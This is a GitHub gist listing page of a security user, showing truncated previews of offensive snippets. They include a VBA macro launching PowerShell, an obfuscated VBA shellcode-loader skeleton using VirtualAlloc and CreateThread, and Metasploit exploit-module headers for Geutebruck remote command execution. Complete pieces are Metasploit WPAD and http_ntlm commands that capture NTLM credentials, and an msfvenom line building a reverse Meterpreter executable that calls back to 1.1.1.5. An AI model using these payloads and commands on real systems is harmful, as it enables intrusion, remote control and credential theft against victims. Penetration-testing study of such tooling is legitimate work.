ddouhine
ddouhine
/ gist:dce26a77406c384f537f9d484d70c430
Created
September 12, 2024 08:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub test() | |
| retval = Shell("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 1) | |
| End Sub |
ddouhine
/ gist:a71226a9a007cab1dedd85714dcd6f21
Last active
September 12, 2024 08:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #If Vba7 Then | |
| Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fjtcdnbu As Long, ByVal Yya As Long, ByVal Eyjfnfctp As LongPtr, Mjbaacp As Long, ByVal Irzpli As Long, Icxunn As Long) As LongPtr | |
| Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kubgdfjao As Long, ByVal Dcrskv As Long, ByVal Bxzplil As Long, ByVal Wemjan As Long) As LongPtr | |
| Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ppvxldjf As LongPtr, ByRef Uvzdtvuzc As Any, ByVal Cbpxabnak As Long) As LongPtr | |
| #Else | |
| Private Declare Function CreateThread Lib "kernel32" (ByVal Fjtcdnbu As Long, ByVal Yya As Long, ByVal Eyjfnfctp As Long, Mjbaacp As Long, ByVal Irzpli As Long, Icxunn As Long) As Long | |
| Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kubgdfjao As Long, ByVal Dcrskv As Long, ByVal Bxzplil As Long, ByVal Wemjan As Long) As Long | |
| Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ppvxldjf As Long, ByRef Uvzdtvuzc As Any, |
ddouhine
/ geutebruck_simple_loglistjs.rb
Created
August 2, 2018 07:51
Geutebruck simple_loglistjs.cgi Remote Command Execution Metasploit Module
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| class MetasploitModule < Msf::Exploit::Remote | |
| Rank = NormalRanking | |
| include Msf::Exploit::Remote::HttpClient |
ddouhine
/ geutebruck_testaction.rb
Created
February 15, 2017 09:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| Rank = NormalRanking | |
| include Msf::Exploit::Remote::HttpClient |
ddouhine
/ polyglot-test.jpg
Last active
December 14, 2016 15:59
ddouhine
/ [JtR] Add JBoss||Wildfly hash format
Last active
September 12, 2018 12:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ///////////////////////////////////////////////////////////////////////////////////////////// | |
| Add these lines to JtR /run/dynamic.conf: | |
| ///////////////////////////////////////////////////////////////////////////////////////////// | |
| [List.Generic:dynamic_1591] | |
| Expression=md5($u:ManagementRealm:$p) | |
| CONST1=:ManagementRealm: | |
| Flag=MGF_USERNAME | |
| Flag=MGF_NOTSSE2Safe | |
| Func=DynamicFunc__clean_input | |
| Func=DynamicFunc__append_userid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://wtfismyip.com/ | |
| http://web-sniffer.net/ | |
| http://www.urlquery.net/ | |
| http://www.rexswain.com/httpview.html | |
| http://httpbin.org | |
| http://requestb.in |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use auxiliary/server/wpad | |
| set PROXY x.x.x.x | |
| run | |
| use auxiliary/server/capture/http_ntlm | |
| set CAINPWFILE /root/cain.http.pw | |
| set JOHNPWFILE /root/john.http.pw | |
| set URIPATH / | |
| set SRVPORT 80 | |
| run |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 3999,5000,5005,8000,8453,8787-8788,9001,18000 |
ddouhine
/ gist:21c560514b30ce235960
Created
June 29, 2015 13:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .../metasploit_4.11.3-2015062101-1kali0_i386.deb | |
| root@kali:~# msfvenom -p windows/meterpreter_reverse_http exitfunc=thread lhost=1.1.1.5 R -a x86 -f exe --platform windows > meter_1.1.1.5.exe | |
| No encoder or badchars specified, outputting raw payload |
NewerOlder